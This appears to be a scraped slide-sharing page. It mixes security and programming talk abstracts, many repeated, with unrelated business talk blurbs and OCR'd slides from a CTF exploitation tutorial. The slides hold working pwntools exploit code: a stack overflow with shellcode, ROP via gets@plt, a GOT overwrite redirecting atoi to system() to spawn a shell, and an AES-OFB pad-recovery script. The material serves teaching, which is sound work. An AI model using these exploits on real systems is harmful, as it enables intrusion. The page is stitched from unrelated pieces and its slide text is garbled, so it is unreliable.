Cisco network equipment has always been an attractive attack target due to its prevalence and the key role that it plays in network structure and security.
This equipment is based on a wide variety of OS (firmware) architectures, types, and versions, so it is much harder to develop a universal shellcode. Publicly available Cisco IOS shellcodes are tailored to specific equipment, have narrow functionality, and are not exactly useful for penetration testing.
This talk is the presentation of a research initiated by our research center to create a shellcode which is as easily portable between different IOS firmwares as possible and which provides a lot of pentesting features because it can dynamically change the shellcode destination at the stage of post-exploitation.
We will also consider the possibility of creating a worm which could spread across the infrastructure, from firewall to router, from router to switch, etc.
Capture the Flag (CTF) are information security challenges. They are fun, but they also provide a opportunity to practise for real-world security challenges.
In this talk we present the concept of CTF. We focus on some tools used by our team, which can also be used to solve real-world problems.
Cisco network equipment has always been an attractive attack target due to its prevalence and the key role that it plays in network structure and security.
This equipment is based on a wide variety of OS (firmware) architectures, types, and versions, so it is much harder to develop a universal shellcode. Publicly available Cisco IOS shellcodes are tailored to specific equipment, have narrow functionality, and are not exactly useful for penetration testing.
This talk is the presentation of a research initiated by our research center to create a shellcode which is as easily portable between different IOS firmwares as possible and which provides a lot of pentesting features because it can dynamically change the shellcode destination at the stage of post-exploitation.
We will also consider the possibility of creating a worm which could spread across the infrastructure, from firewall to router, from router to switch, etc.
Capture the Flag (CTF) are information security challenges. They are fun, but they also provide a opportunity to practise for real-world security challenges.
In this talk we present the concept of CTF. We focus on some tools used by our team, which can also be used to solve real-world problems.
This event is part of our ongoing series about IT Security. In this session, Carl Svensson, a security professional working in the Google Offensive Security team, gives us an introduction to Binary Exploitation. Watch the recording at https://dscmunich.de/binexp
Specializing the Data Path - Hooking into the Linux Network StackKernel TLV
Ever needed to add your custom logic into the network stack?
Ever hacked the network stack but wasn't certain you're doing it right?
Shmulik Ladkani talks about various mechanisms for customizing packet processing logic to the network stack's data path.
He covers covering topics such as packet sockets, netfilter hooks, traffic control actions and ebpf. We will discuss their applicable use-cases, advantages and disadvantages.
Shmulik Ladkani is a Tech Lead at Ravello Systems.
Shmulik started his career at Jungo (acquired by NDS/Cisco) implementing residential gateway software, focusing on embedded Linux, Linux kernel, networking and hardware/software integration.
51966 coffees and billions of forwarded packets later, with millions of homes running his software, Shmulik left his position as Jungo’s lead architect and joined Ravello Systems (acquired by Oracle) as tech lead, developing a virtual data center as a cloud service. He's now focused around virtualization systems, network virtualization and SDN.
Introduce Brainf*ck, another Turing complete programming language. Then, try to implement the following from scratch: Interpreter, Compiler [x86_64 and ARM], and JIT Compiler.
Comment un hacker voit votre site internet ?
Démonstration d'un point de vue d'une attaque sur un Wordpress.
Petite présentation de veille, de mise en garde, d'outils.
Streams are a fundamental programming primitive for representing the flow of data through your system. It's time we brought this powerful tool to the web. What if we could stream data from a HTTP request, through a web worker that transforms it, and then into a <video> tag? Over the last year, I've been working on the WHATWG streams specification, which builds upon the lessons learned in Node.js, to provide a suitable abstraction for needs of the extensible web.
I'll discuss briefly why streams are important, what they enable, and the role we envision them playing in the future of the web platform. Mostly, though, I want to help you understand streams, at a deep level. In the course of writing this specification, I've learned a lot about streams, and I want to share that knowledge with you. At the core, they are a very simple and beautiful abstraction. I think we've done a good job capturing that abstraction, and producing an API the web can be proud of. I'd love to tell you all about it.
Build a full-functioned virtual machine from scratch, when Brainfuck is used. Basic concepts about interpreter, optimizations techniques, language specialization, and platform specific tweaks.
University of Virginia
cs4414: Operating Systems
http://rust-class.org
What happened with Apple's SSL implementation
How to make sure this doesn't happen to you!
Sharing data
ARCs in Rust
Scheduling
For embedded notes, see:
This event is part of our ongoing series about IT Security. In this session, Carl Svensson, a security professional working in the Google Offensive Security team, gives us an introduction to Binary Exploitation. Watch the recording at https://dscmunich.de/binexp
Specializing the Data Path - Hooking into the Linux Network StackKernel TLV
Ever needed to add your custom logic into the network stack?
Ever hacked the network stack but wasn't certain you're doing it right?
Shmulik Ladkani talks about various mechanisms for customizing packet processing logic to the network stack's data path.
He covers covering topics such as packet sockets, netfilter hooks, traffic control actions and ebpf. We will discuss their applicable use-cases, advantages and disadvantages.
Shmulik Ladkani is a Tech Lead at Ravello Systems.
Shmulik started his career at Jungo (acquired by NDS/Cisco) implementing residential gateway software, focusing on embedded Linux, Linux kernel, networking and hardware/software integration.
51966 coffees and billions of forwarded packets later, with millions of homes running his software, Shmulik left his position as Jungo’s lead architect and joined Ravello Systems (acquired by Oracle) as tech lead, developing a virtual data center as a cloud service. He's now focused around virtualization systems, network virtualization and SDN.
Introduce Brainf*ck, another Turing complete programming language. Then, try to implement the following from scratch: Interpreter, Compiler [x86_64 and ARM], and JIT Compiler.
Comment un hacker voit votre site internet ?
Démonstration d'un point de vue d'une attaque sur un Wordpress.
Petite présentation de veille, de mise en garde, d'outils.
Streams are a fundamental programming primitive for representing the flow of data through your system. It's time we brought this powerful tool to the web. What if we could stream data from a HTTP request, through a web worker that transforms it, and then into a <video> tag? Over the last year, I've been working on the WHATWG streams specification, which builds upon the lessons learned in Node.js, to provide a suitable abstraction for needs of the extensible web.
I'll discuss briefly why streams are important, what they enable, and the role we envision them playing in the future of the web platform. Mostly, though, I want to help you understand streams, at a deep level. In the course of writing this specification, I've learned a lot about streams, and I want to share that knowledge with you. At the core, they are a very simple and beautiful abstraction. I think we've done a good job capturing that abstraction, and producing an API the web can be proud of. I'd love to tell you all about it.
Build a full-functioned virtual machine from scratch, when Brainfuck is used. Basic concepts about interpreter, optimizations techniques, language specialization, and platform specific tweaks.
University of Virginia
cs4414: Operating Systems
http://rust-class.org
What happened with Apple's SSL implementation
How to make sure this doesn't happen to you!
Sharing data
ARCs in Rust
Scheduling
For embedded notes, see:
BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...Alexandre Moneger
This presentation shows that code coverage guided fuzzing is possible in the context of network daemon fuzzing.
Some fuzzers are blackbox while others are protocol aware. Even ones which are made protocol aware, fuzzer writers typically model the protocol specification and implement packet awareness logic in the fuzzer. Unfortunately, just because the fuzzer is protocol aware, it does not guarantee that sufficient code paths have been reached.
The presentation deals with specific scenarios where the target protocol is completely unknown (proprietary) and no source code or protocol specs are accessible. The tool developed builds a feedback loop between the client and the server components using the concept of "gate functions". A gate function triggers monitoring. The pintool component tracks the binary code coverage for all the functions untill it reaches an exit gate. By instrumenting such gated functions, the tool is able to measure code coverage during packet processing.
Multiplatform JIT Code Generator for NetBSD by Alexander Nasonoveurobsdcon
Abstract
The next release of NetBSD will have a support for Just-In-Time (JIT) compilation of bpf programs in the kernel; this change will greatly speed-up traffic sniffing on multiple platforms. Unlike similar interface in other operating systems, bpfjit uses a unified programming interface for code generation which is based on Stack Less JIT Compiler library (SLJIT) and which supports x86, mips, arm, sparc and some other platforms.
The speaker will give an overview of SLJIT API and discuss some implementation details of the bpfjit code with emphasis on supported optimizations of bpf programs by JIT engine. He will also touch on unit testing of dynamically generated code running inside the kernel and on other areas in the NetBSD project where bpfjit can help in boosting performance."
Speaker bio
Alex is a software developer working in the financial sector in the City of London. He often amuses fellow tube passengers with C or Lua coding in NetBSD console and sometimes even with the green kernel debugger prompt.
Protocol T50: Five months later... So what?Nelson Brito
T50 (an Experimental Mixed Packet Injector) new features added to version 5.3 (Chaos Maker).
Check the original demonstration videos:
- https://www.youtube.com/playlist?list=PLda9TmFadx_m2qdd-euUf4zhQ-5juTVEx
For further source codes, please, refer to:
- http://t50.sourceforge.net/
[ENG] IPv6 shipworm + My little Windows domain pwnieZoltan Balazs
Hacktivity 2011 presentation about IPv6 Teredo protocol, Windows pass-the-hash attack
Original video in Hungarian: http://vimeo.com/31359639
Translated version: http://vimeo.com/31360814
Adventures in Femtoland: 350 Yuan for Invaluable Funarbitrarycode
GSM networks are compromised for over five years. Starting from passive sniffing of unencrypted traffic, moving to a fully compromised A5/1 encryption and then even to your own base station, we have different tools and opportunities. A Motorola phone retails for only $5 gives you the opportunity to peep into your girlfriend's calls. RTL-SDR retails for $20 which allows you to intercept all two-factor authentication in a medium-sized office building. Lastly, USRP retails for $700 and can intercept almost everything that you can see in 2G.
But who cares about 2G? Those who are concerned switched off of 2G. AT&T is preparing to switch off all its 2G networks by the end of 2016. Even GSMA (GSM Alliance) admitted that security through obscurity is a bad idea (referring to COMP128, A5/*, GEA algorithms and other things). 3G and LTE networks have mandatory cryptographical integrity checks for all communications, mutual authentication both for mobile devices and base station. The opportunity to analyze all protocols and cryptographical primitives due to their public availability is important.
However, the main problem is that we do not have calypso phones for 3G. We do not have cheap and ready to use devices to fuzz 3G devices over the air. Or do we? What about femtocells? Perhaps telecoms are to fast to take their guard down with security considerations embedded in 3G/4G? Users can connect to femocells. and have access the Internet on high speeds, make calls, ect.. Why don't we abuse it?
Yes, there is already research that allows you to gain control over femtocell. There is also research that allows sniffing calls and messages after gaining control. But all such solutions are not scalable. You are still bound to the telecom provider. You still have to connect to a VPN - to a core network. You have to bypass location binding and so on. Perhaps there is an easier solution? Parhaps we can create UMTS-in-a-box from readily available femtocell and have them available in large quantities without telecom-branding? We already know.
We will tell the whole story from unboxing to proof-of-concept data intercept and vulnerabilities in UMTS networks with all your favorite acronyms: HNB, SeGW, HMS, RANAP, SCTP, TR-069.
CTF3, Stripe's third Capture-the-Flag, focused on distributed systems engineering with a goal of learning to build fault-tolerant, performant software while playing around with a bunch of cool cutting-edge technologies.
More here: https://stripe.com/blog/ctf3-launch.
"A rootkits writer’s guide to defense" - Michal PurzynskiPROIDEA
Michal will take you on a journey all the way to 90’s and back, sharing the Mozilla detection framework - a systematic way to detect and hunt down threat actors. Why did we spend hours digging through some old Phrack issues? How does a blue team's member approach writing rootkits? What is better - a fail negative or a false positive? I will share answers to these questions plus a lot of alerting and evil-doing code.
Presenter notes: https://www.dropbox.com/s/lq6oxuw1s3bhoun/Advanced%20Linux%20Game%20Programming%20%E2%80%93%20Presenter%20Notes.pdf
Ever since the advent of SteamOS, interest in game development for Linux has seen an increase. This lecture aims to address some more advanced issues encountered by programmers on this platform, beyond the very basic Linux setup, and drawing from over a year and two and a half games of experience in the subject. The areas discussed will be:
• Executable build improvements
• Crash handling and reporting
• Memory debugging
• OpenGL instrumentation and debugging
• Various caveats, tips and tricks.
The str/bytes nightmare before python2 EOLKir Chou
Note: download the slide will give your better experience.
This talk was giving at PyConTW 2019.
https://tw.pycon.org/2019/en-us/events/talk/839036452602904785/
Youtube video will be released later.
Rainbow Over the Windows: More Colors Than You Could ExpectPeter Hlavaty
As time goes on operating systems keep evolving, like Microsoft Windows do, it ships new designs, features and codes from time to time. However sometimes it also ships more than bit of codes for complex subsystems residing in its kernel ... and at some future point it starts implementing new designs to prevent unnecessary access to it. However is it safe enough?
As we can see from security bulletins, win32k subsystem attracts lots of attention. It looks that with efforts of many security researchers who has dug into this area, finding bugs here shall becomes pretty tough and almost fruitless. But unfortunately this is not true, as win32k is backed up by very complex logic and large amount of code by nature..
We will present our point of view to Windows graphic subsystem, as well as schema of our fuzzing strategies. We will introduce some unusual areas of win32k, its extensions and how it can breaks even locked environments.
Part of our talk will be dedicated to CVE-2016-0176, the bug we used for this year's Pwn2Own Edge sandbox bypass, from its discovery to its exploitation techniques, which could serves as an example for universal DirectX escape which is independent of graphics vendors.
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...CODE BLUE
Malware utilize many cryptographic algorithms.
To fight against malware, analysts have to reveal details on malware activities.
Accordingly, it is important to identify cryptographic algorithms used in malware.
In this track, I propose a faster and extensible method to automatically detect known cryptographic algorithms in malware using dynamic binary instrumentation and fuzzy hashing.
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...UiPathCommunity
💥 Speed, accuracy, and scaling – discover the superpowers of GenAI in action with UiPath Document Understanding and Communications Mining™:
See how to accelerate model training and optimize model performance with active learning
Learn about the latest enhancements to out-of-the-box document processing – with little to no training required
Get an exclusive demo of the new family of UiPath LLMs – GenAI models specialized for processing different types of documents and messages
This is a hands-on session specifically designed for automation developers and AI enthusiasts seeking to enhance their knowledge in leveraging the latest intelligent document processing capabilities offered by UiPath.
Speakers:
👨🏫 Andras Palfi, Senior Product Manager, UiPath
👩🏫 Lenka Dulovicova, Product Program Manager, UiPath
"Impact of front-end architecture on development cost", Viktor TurskyiFwdays
I have heard many times that architecture is not important for the front-end. Also, many times I have seen how developers implement features on the front-end just following the standard rules for a framework and think that this is enough to successfully launch the project, and then the project fails. How to prevent this and what approach to choose? I have launched dozens of complex projects and during the talk we will analyze which approaches have worked for me and which have not.
The Art of the Pitch: WordPress Relationships and SalesLaura Byrne
Clients don’t know what they don’t know. What web solutions are right for them? How does WordPress come into the picture? How do you make sure you understand scope and timeline? What do you do if sometime changes?
All these questions and more will be explored as we talk about matching clients’ needs with what your agency offers without pulling teeth or pulling your hair out. Practical tips, and strategies for successful relationship building that leads to closing the deal.
PHP Frameworks: I want to break free (IPC Berlin 2024)Ralf Eggert
In this presentation, we examine the challenges and limitations of relying too heavily on PHP frameworks in web development. We discuss the history of PHP and its frameworks to understand how this dependence has evolved. The focus will be on providing concrete tips and strategies to reduce reliance on these frameworks, based on real-world examples and practical considerations. The goal is to equip developers with the skills and knowledge to create more flexible and future-proof web applications. We'll explore the importance of maintaining autonomy in a rapidly changing tech landscape and how to make informed decisions in PHP development.
This talk is aimed at encouraging a more independent approach to using PHP frameworks, moving towards a more flexible and future-proof approach to PHP development.
Let's dive deeper into the world of ODC! Ricardo Alves (OutSystems) will join us to tell all about the new Data Fabric. After that, Sezen de Bruijn (OutSystems) will get into the details on how to best design a sturdy architecture within ODC.
DevOps and Testing slides at DASA ConnectKari Kakkonen
My and Rik Marselis slides at 30.5.2024 DASA Connect conference. We discuss about what is testing, then what is agile testing and finally what is Testing in DevOps. Finally we had lovely workshop with the participants trying to find out different ways to think about quality and testing in different parts of the DevOps infinity loop.
State of ICS and IoT Cyber Threat Landscape Report 2024 previewPrayukth K V
The IoT and OT threat landscape report has been prepared by the Threat Research Team at Sectrio using data from Sectrio, cyber threat intelligence farming facilities spread across over 85 cities around the world. In addition, Sectrio also runs AI-based advanced threat and payload engagement facilities that serve as sinks to attract and engage sophisticated threat actors, and newer malware including new variants and latent threats that are at an earlier stage of development.
The latest edition of the OT/ICS and IoT security Threat Landscape Report 2024 also covers:
State of global ICS asset and network exposure
Sectoral targets and attacks as well as the cost of ransom
Global APT activity, AI usage, actor and tactic profiles, and implications
Rise in volumes of AI-powered cyberattacks
Major cyber events in 2024
Malware and malicious payload trends
Cyberattack types and targets
Vulnerability exploit attempts on CVEs
Attacks on counties – USA
Expansion of bot farms – how, where, and why
In-depth analysis of the cyber threat landscape across North America, South America, Europe, APAC, and the Middle East
Why are attacks on smart factories rising?
Cyber risk predictions
Axis of attacks – Europe
Systemic attacks in the Middle East
Download the full report from here:
https://sectrio.com/resources/ot-threat-landscape-reports/sectrio-releases-ot-ics-and-iot-security-threat-landscape-report-2024/
UiPath Test Automation using UiPath Test Suite series, part 3DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 3. In this session, we will cover desktop automation along with UI automation.
Topics covered:
UI automation Introduction,
UI automation Sample
Desktop automation flow
Pradeep Chinnala, Senior Consultant Automation Developer @WonderBotz and UiPath MVP
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
Epistemic Interaction - tuning interfaces to provide information for AI supportAlan Dix
Paper presented at SYNERGY workshop at AVI 2024, Genoa, Italy. 3rd June 2024
https://alandix.com/academic/papers/synergy2024-epistemic/
As machine learning integrates deeper into human-computer interactions, the concept of epistemic interaction emerges, aiming to refine these interactions to enhance system adaptability. This approach encourages minor, intentional adjustments in user behaviour to enrich the data available for system learning. This paper introduces epistemic interaction within the context of human-system communication, illustrating how deliberate interaction design can improve system understanding and adaptation. Through concrete examples, we demonstrate the potential of epistemic interaction to significantly advance human-computer interaction by leveraging intuitive human communication strategies to inform system design and functionality, offering a novel pathway for enriching user-system engagements.
5. CTF
• Type of CTFs
• Jeopardy – Any type of problems
• Attack and Defense – Pwn + Patch
• King of the Hill – Pwn + Patch
• AIS3 Final CTF
• Jeopardy style
• Misc, Binary, Pwn, Web, Crypto
5
7. Simple Buffer Overflow
• Outdated Implementation • Input "A" * 20
7
int func1(int a, int b, int c) {
char buffer[8]; // declare a character array of 8 bytes
gets(buffer); // read user input string
return 0; // return zero
}
buffer[8]
0x00000000
0xffffffff
EBP
ret-addr
a
Stack grows in this way
b
c
Last
Stack Frame Current Stack Frame
......
0x41414141
0x41414141
0x00000000
0xffffffff
0x41414141
0x41414141
0x41414141
Stack grows in this way
b
c
Last
Stack Frame
Current Stack Frame
......
8. Stack Protector
• With Stack Protector • Input "A" * 20
8
buffer[8]
0x00000000
0xffffffff
EBP
ret-addr
a
Stack grows in this way
b
c
Last
Stack Frame
Current Stack Frame
......
Canary (?)
0x41414141
0x41414141
0x00000000
0xffffffff
0x41414141
0x41414141
a
Stack grows in this way
b
c
Last
Stack Frame
Current Stack Frame
......
0x41414141
11. ASLR (Cont’d)
• Without ASLR (0) • With ASLR (1, 2)
11
$ ./a.out
main = 0x80484cd
gets = 0x8048380
buf = 0xffffd3ac
m = 0x804b008
$ ./a.out
main = 0x80484cd
gets = 0x8048380
buf = 0xffffd3ac
m = 0x804b008
$ ./a.out
main = 0x80484cd
gets = 0x8048380
buf = 0xffffd3ac
m = 0x804b008
./a.out
main = 0x80484cd
gets = 0x8048380
buf = 0xffdf6d8c
m = 0x9b03008
$ ./a.out
main = 0x80484cd
gets = 0x8048380
buf = 0xff86930c
m = 0x9b1e008
$ ./a.out
main = 0x80484cd
gets = 0x8048380
buf = 0xfff9b4bc
m = 0x88f3008
char buf[64];
printf("main = %pn", main);
printf("gets = %pn", gets);
printf(" buf = %pn", buf);
printf(" m = %pn", malloc(16));
12. Misc. Issue – xinetd
12
service gagb
{
disable = no
type = UNLISTED
id = gagb
socket_type = stream
protocol = tcp
user = gagb
group = gagb
wait = no
server = /home/gagb/gagb
port = 9192
}
19. cry2 – The Source Code
19
1: key = "XXXXXXXXXXXXXXXX”
2: iv = ''.join(random.choice(string.hexdigits) for _ in range(16))
3: flag = "ais3{NEVERPHDNEVERPHDNEVERPHD..}" # Not real flag ...
4:
5: def encrypt(p):
6: return AES.new(key, AES.MODE_OFB, iv).encrypt(p)
...
7: print encrypt(flag).encode("hex")
8: while True:
...
9: p = ''.join(random.choice(string.lowercase) for _ in range(32))
10: print encrypt(p).encode("hex")
23. cry2 – Use Pwntools
• Pwntools
• A good CTF framework implemented in python
• https://github.com/Gallopsled/pwntools
• Quick Installation Guide (Ubuntu)
23
$ sudo apt-get install binutils python-dev python-pip
$ sudo pip install pwntools
24. cry2 – Enumerate All Ciphertexts
24
1: #!/usr/bin/env python
2: from pwn import *
3:
4: #r = remote('54.xxx.yyy.zzz', 5566)
5: r = process("./src.py")
6: ciphers = []
6:
7: while len(ciphers) < 100:
8: s = r.recvline().strip()
9: if len(s) == 64:
10: ciphers.append(s)
11: r.send('n')
25. cry2 – Pseudocodes to Obtain the
XOR-Pad
25
Given c: The list containing n ciphertexts (except the first one)
c = [ c1, c2, c3, …, cn ]
Suppose cu,v represents the vth byte in ciphertext cu, 1 ≤ u ≤ n
pad = "";
for v = 1 to 32:
for x = 0 to 255:
if x XOR cu,v is a lowercase alphabet for all u in [1, n]
pad = pad + x
break
use pad to decrypt the real ciphertext and obtain the flag
32. gagb – Solution
• Eh … We have to guess the number first!!
• Strategy #1: Play with the game
• Pwntools: recv, send … try all possible combinations
• Strategy #2: Use the random number trick
• Remember we have: srand(time(0)) + rand()?
• In python, we can do:
32
1: from ctypes import *
2: cdll.LoadLibrary("libc.so.6")
3: libc = CDLL("libc.so.6")
4: libc.srand(libc.time(0))
5: print libc.rand();
33. gagb – A Tricky Solution
33
1: r = process("./gagb"); # this is from pwntools …
2: num = ""
3: while len(num) < 4:
4: while True:
5: d = chr(libc.rand() % 10 + 48)
6: if len(set(num + d)) == len(num + d):
7: num = num + d
8: break
9: print r.recv()
10: print num
11: r.send(num + 'n')
12: print r.recv()
• Use ntpdateto synchronize your system clock
• You may need to uncheck "Hardware Clock in UTC Time" if you are playing
with VirtualBox or other virtual machines …
34. gagb – The Overflow Part:
Strategy #1
• The old tricks
• You have to guess the stack address
• Fill "A"*28 + addr + NOP*n + shellcode
34
context(arch = 'i386', os = 'linux')
...
shell = asm(shellcraft.sh())
r.send('A'*28 + p32(0xffffdd70) + "x90" * 400 + shell + "n")
r.interactive()
36. gagb – The Overflow Part:
Strategy #2 (1/3)
• We would not like to guess any more L
• Ask 'gets()' to do something for us
• Remember that 'gets()' requires one arguments –
the address to store the user input string
36
37. gagb – The Overflow Part:
Strategy #2 (2/3)
• We want the stack to looks like …
37
s[24]
0x00000000
0xffffffff
EBP
addr of gets()
Stack grows in this way
......
ret-addr
argument #1
return addr after gets()
address for gets() to fill
garbage
38. gagb – The Overflow Part:
Strategy #2 (3/3)
• gets@pltcan be obtained using objdump -d gagb
• After gets() finished, the program jumps to the
buffer that we have filled the shell code
38
r.send('A'*28 + p32(0x08048430) # gets@plt
+ p32(0x0804a034) + p32(0x0804a034) # any writable address
+ p32(0x12345678) * 100 + "n") # garbage
r.send(shell + "n") # fill gets() buffer
r.interactive()
08048430 <gets@plt>:
8048430: ff 25 0c a0 04 08 jmp *0x804a00c ; in GOT table
8048436: 68 00 00 00 00 push $0x0
804843b: e9 e0 ff ff ff jmp 8048420 <gets@plt-0x10>
39. gagb – Security Practice
• No more gets()
• Use /dev/urandomor /dev/random
• Or, alternatively, at least do
39
srand(time(0) ^ getpid());
44. phddb – Feature Summary
• Data stored in heap – use malloc()
• dump
• add
• Allocate header first (32 bytes)
• Allocate thesis-text according to
the given length
• edit
• Modify header content
• Reallocate thesis-text if necessary
• remove
44
thesis text ...
thesis text ...
......
0x00000000
0xffffffff
name[20]
age
length
*thesis
name[20]
age
length
*thesis
Record #0Record #1
46. phddb – Solution (1/6)
46
1. Add two records 2. Edit records #0 3. Add one more record
thesis text ...
thesis text ...
......
0x00000000
0xffffffff
name (aaa)
age
length (32)
*thesis
name (bbb)
age
length (32)
*thesis
Record #0Record #1
thesis text ...
freed
......
0x00000000
0xffffffff
name (aaa)
age
length (32)
*thesis
name (bbb)
age
length (32)
*thesis
Record #0Record #1
thesis text ...
thesis text ...
...
0x00000000
0xffffffff
name (aaa)
age
length (32)
*thesis
name (bbb)
age
length (32)
*thesis
Record #0Record #1
name (ccc)
age
length (32)
*thesis
Record #2Record #2
47. phddb – Solution (2/6)
• We want to know the real address of atoi in
memory
• We can then know the C library base
• Real address of atoi minus atoi’s offset in C library
• Use objdump -d libc.so.6 to get atoi’s offset
• From objdump -d phddb, we got
the GOT entry address for atoi is 0x804b03c
47
08048560 <atoi@plt>:
8048560: ff 25 3c b0 04 08 jmp *0x804b03c
8048566: 68 60 00 00 00 push $0x60
804856b: e9 20 ff ff ff jmp 8048490 <_init+0x30>
48. phddb – Solution (3/6)
• Edit record #0
• Fill thesis text using:
• "A" * 24
• 0x20 (length)
• 0x804b03c
• GOT entry is a function
pointer to the real
address of a function
(in .so)
• Dump record #2
• Reveal atoi(?)
48
atoi (?)
c99_scanf
......
GOT
0x804b03c
0x804b038
0x804b040
thesis text ...
thesis text ...
...
0x00000000
0xffffffff
name (aaa)
age
length (32)
*thesis
name (bbb)
age
length (32)
*thesis
Record #0Record #1
name (ccc)
age
length (32)
*thesis
Record #2Record #2
50. phddb – Solution (5/6)
• Recall that the main function does read() + atoi()
• We can replace atoi’s GOT entry value to any
functionwe want to call
• Replace atoi’s GOT entry value with the real
address of system(), and then send 'shn'
• Simple arithmetic
• atoi‘s real address = 0xf7e59560
• atoi offset in C library = 0x31560
• system offset in C library = 0x3fcd0
• system’s real address= 0xf7e59560 – 0x31560 + 0x3fcd0
= 0xf7e67cd0
50
51. phddb – Solution (6/6)
• Edit record #0
• Fill thesis text using:
• "A" * 24
• 0x20 (length)
• 0xf7e67cd0
• read() + atoi()
now becomes
read() + system()
• Send 'shn'
51
atoi (0xf7e59560)
c99_scanf
......
GOT
0x804b03c
0x804b038
0x804b040
thesis text ...
thesis text ...
...
0x00000000
0xffffffff
name (aaa)
age
length (32)
*thesis
name (bbb)
age
length (32)
*thesis
Record #0Record #1
name (ccc)
age
length (32)
*thesis
Record #2Record #2
system (0xf7e67cd0)
55. From CTF to CGC
• The Cyber War
• Cyber Army
• Capture The Flag (CTF)
• Information security competition
• Cyber Grand Challenge (CGC)
• All-computer CTF tournament
• Held by DARPA of US DoD with the DEFCON Conference in Las Vegas in 2016
55
56. Objective
• Build a Cyber Reasoning System(CRS)
• Follow CGC rules
• Automatic attack and defense
• Automatic Attack
• Analyze the program binary to find the failure
• Generate exploit
• Payload to bypass mitigation
• Automatic Defense
• Analyze the program to find the fault
• Find the faulty point
• Patch the fault in binary level
56
64. Result – Compare with ROPgadget
• ROPgadget: Common open source search and chain gadgets tool
Tool
Compare
Exploit Strengthening ROPgadget
Gadget Type Long/Short Gadgets Short Gadgets
Payload Type
Turing complete
ROP Payload API
One type payload
Integrate CRAX + Metasploit